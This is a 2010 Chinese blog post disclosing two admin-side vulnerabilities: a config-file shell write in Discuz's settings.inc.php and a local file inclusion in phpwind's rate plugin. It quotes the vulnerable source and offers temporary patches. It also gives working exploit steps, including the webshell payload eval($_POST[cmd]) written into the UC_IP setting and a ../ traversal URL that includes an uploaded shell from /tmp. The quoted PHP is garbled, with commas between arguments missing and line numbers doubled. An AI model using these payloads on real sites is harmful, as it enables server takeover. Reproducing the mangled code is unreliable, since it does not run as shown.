<![CDATA[刘新修]]> http://pic1.liuxinxiu.com:80/index.php zh-cn http://pic1.liuxinxiu.com:80/s// <![CDATA[discuz和phpwind的漏洞]]> 刘新修 <admin@yourname.com> Thu, 02 Sep 2010 16:27:51 +0000 http://pic1.liuxinxiu.com:80/s// 多人有了,流传出来了,然后发出来。现在的漏洞,如果主动公布的,肯定是“无鸡肋不公布”,否则肯定是藏着,除非别人公布了。DZ的鸡肋在于需要创建者的权限(创建者的密码一般比较难搞),pw的鸡肋在于需要截断(或者linux旁注写一个shell到tmp下)。

一、discuz后台settings.inc.php中写shell漏洞:

PHP代码
        
  1. if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {   
    2.     
  2.          $ucdbpassnew = $settingsnew['uc']['dbpass'] == '********' ? UC_DBPW : $settingsnew['uc']['dbpass'];   
    3.     
  3.          if($settingsnew['uc']['connect']) {   
    4.     
  4.              $uc_dblink = @mysql_connect($settingsnew['uc']['dbhost'], $settingsnew['uc']['dbuser'], $ucdbpassnew, 1);   
    5.     
  5.              if(!$uc_dblink) {   
    6.     
  6.                  cpmsg('uc_database_connect_error''''error');   
    7.     
  7.              } else {   
    8.     
  8.                  mysql_close($uc_dblink);   
    9.     
  9.              }   
    10.     
  10.          }   
    11.     
  11.   
    12.     
  12.          $fp = fopen('./config.inc.php''r');   
    13.     
  13.          $configfile = fread($fpfilesize('./config.inc.php'));   
    14.     
  14.          $configfile = trim($configfile);   
    15.     
  15.          $configfile = substr($configfile, -2) == '?>' ? substr($configfile, 0, -2) : $configfile;   
    16.     
  16.          fclose($fp);   
    17.     
  17.   
    18.     
  18.          $connect = '';   
    19.     
  19.          if($settingsnew['uc']['connect']) {   
    20.     
  20.              require './config.inc.php';   
    21.     
  21.              $connect = 'mysql';   
    22.     
  22.              $samelink = ($dbhost == $settingsnew['uc']['dbhost'] && $dbuser == $settingsnew['uc']['dbuser'] && $dbpw == $ucdbpassnew);   
    23.     
  23.              $samecharset = !($dbcharset == 'gbk' && UC_DBCHARSET == 'latin1' || $dbcharset == 'latin1' && UC_DBCHARSET == 'gbk');   
    24.     
  24.              $configfile = insertconfig($configfile"/define\('UC_DBHOST',\s*'.*?'\);/i""define('UC_DBHOST', '".$settingsnew['uc']['dbhost']."');");//正则表示从'到')中的被替换,而')可以被任意提交,from oldjun.com   
    25.     
  25.              $configfile = insertconfig($configfile"/define\('UC_DBUSER',\s*'.*?'\);/i""define('UC_DBUSER', '".$settingsnew['uc']['dbuser']."');");   
    26.     
  26.              $configfile = insertconfig($configfile"/define\('UC_DBPW',\s*'.*?'\);/i""define('UC_DBPW', '".$ucdbpassnew."');");   
    27.     
  27.              $configfile = insertconfig($configfile"/define\('UC_DBNAME',\s*'.*?'\);/i""define('UC_DBNAME', '".$settingsnew['uc']['dbname']."');");   
    28.     
  28.              $configfile = insertconfig($configfile"/define\('UC_DBTABLEPRE',\s*'.*?'\);/i""define('UC_DBTABLEPRE', '`".$settingsnew['uc']['dbname'].'`.'.$settingsnew['uc']['dbtablepre']."');");   
    29.     
  29.              //$configfile = insertconfig($configfile, "/define\('UC_LINK',\s*'?.*?'?\);/i", "define('UC_LINK', ".($samelink && $samecharset ? 'TRUE' : 'FALSE').");");   
    30.     
  30.          }   
    31.     
  31.          $configfile = insertconfig($configfile"/define\('UC_CONNECT',\s*'.*?'\);/i""define('UC_CONNECT', '$connect');");   
    32.     
  32.          $configfile = insertconfig($configfile"/define\('UC_KEY',\s*'.*?'\);/i""define('UC_KEY', '".$settingsnew['uc']['key']."');");   
    33.     
  33.          $configfile = insertconfig($configfile"/define\('UC_API',\s*'.*?'\);/i""define('UC_API', '".$settingsnew['uc']['api']."');");   
    34.     
  34.          $configfile = insertconfig($configfile"/define\('UC_IP',\s*'.*?'\);/i""define('UC_IP', '".$settingsnew['uc']['ip']."');");   
    35.     
  35.          $configfile = insertconfig($configfile"/define\('UC_APPID',\s*'?.*?'?\);/i""define('UC_APPID', '".$settingsnew['uc']['appid']."');");   
    36.     
  36.   
    37.     
  37.          $fp = fopen('./config.inc.php', 'w');  
    38.     
  38.          if(!($fp = @fopen('./config.inc.php', 'w'))) {  
    39.     
  39.              cpmsg('uc_config_write_error', '', 'error');   
    40.     
  40.          }   
    41.     
  41.          @fwrite($fp, trim($configfile));   
    42.     
  42.          @fclose($fp);   
    43.     
  43.      }    
    44.     
  44.   

漏洞详情:

settings.inc.php对提交的数据缺乏有效过滤,导致可以写入')污染配置文件的数据,而insertconfig函数的则匹配无法正确匹配到最后,导致可以经过2次输入可以成功绕过daddslashes把shell写进配置文件。

PHP代码
        
  1. function insertconfig($s$find$replace) {   
    2.     
  2. if(preg_match($find$s)) {   
    3.     
  3. $s = preg_replace($find$replace$s);//正则匹配替换数据   
    4.     
  4. else {   
    5.     
  5. $s .= "\r\n".$replace;   
    6.     
  6. }   
    7.     
  7. return $s;   
    8.     
  8. }   

漏洞测试:

步骤一:UC_IP(UC_IP是可选项,随便写入一般不影响程序运行)中写入污染数据:xxx');eval($_POST[cmd])?>提交;
步骤二:UC_IP随便输入aaa,正则匹配只匹配到了'),于是自动把分号前的闭合了。

临时补丁:

在if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {下添加:

PHP代码
        
  1. foreach($settingsnew['uc'as $key => $value){   
    2.     
  2. $settingsnew['uc'][$key]=str_replace(')','',$value);   
    3.     
  3. }  

二、phpwind后台本地包含漏洞:

漏洞详情:

文件:hack\rate\admin.php
源码:

PHP代码
        
  1. <?php   
    2.     
  2. !function_exists('readover') && exit('Forbidden');   
    3.     
  3. define ( "H_R", R_P . "hack/rate/" );   
    4.     
  4. define ( "L_R", R_P . "lib/" );   
    5.     
  5. InitGP ( array ('ajax' ) );   
    6.     
  6. $action = strtolower ( ($job) ? $job : "admin" );   
    7.     
  7. $filepath = H_R . "action/" . $action . "Action.php";   
    8.     
  8.   
    9.     
  9. (! file_exists ( $filepath )) && exit ();   
    10.     
  10.   
    11.     
  11. if ($job != "ajax") {   
    12.     
  12.      require H_R . '/template/layout.php';   
    13.     
  13. else {   
    14.     
  14.      require_once $filepath;   
    15.     
  15. }   
    16.     
  16.   
    17.     
  17. ?>    
    18.     
  18.   

$job可以自定义,触发本地包含,只不过addslashes了,因此不能通过%00截断;但可以通过若干///////截断,或者直接在tmp文件夹下写个shell来包含。具体不多说了,利用办法:

漏洞测试:

先在tmp下上传一个shell,名为Action.php
然后访问:http://127.0.0.1/pw/admin.php?adminjob=hack&hackset=rate&typeid=100&job=../../../../../../tmp/

临时补丁:

PHP代码
        
  1. $filepath = H_R . "action/" . $action . "Action.php";  

替换为:

PHP代码
        
  1. $filepath = Pcv(H_R . "action/" . $action . "Action.php");  

 


Tags - , ]]> http://pic1.liuxinxiu.com:80/s//#blogcomment <![CDATA[[评论] discuz和phpwind的漏洞]]> <user@domain.com> Thu, 01 Jan 1970 00:00:00 +0000 http://pic1.liuxinxiu.com:80/s//#blogcomment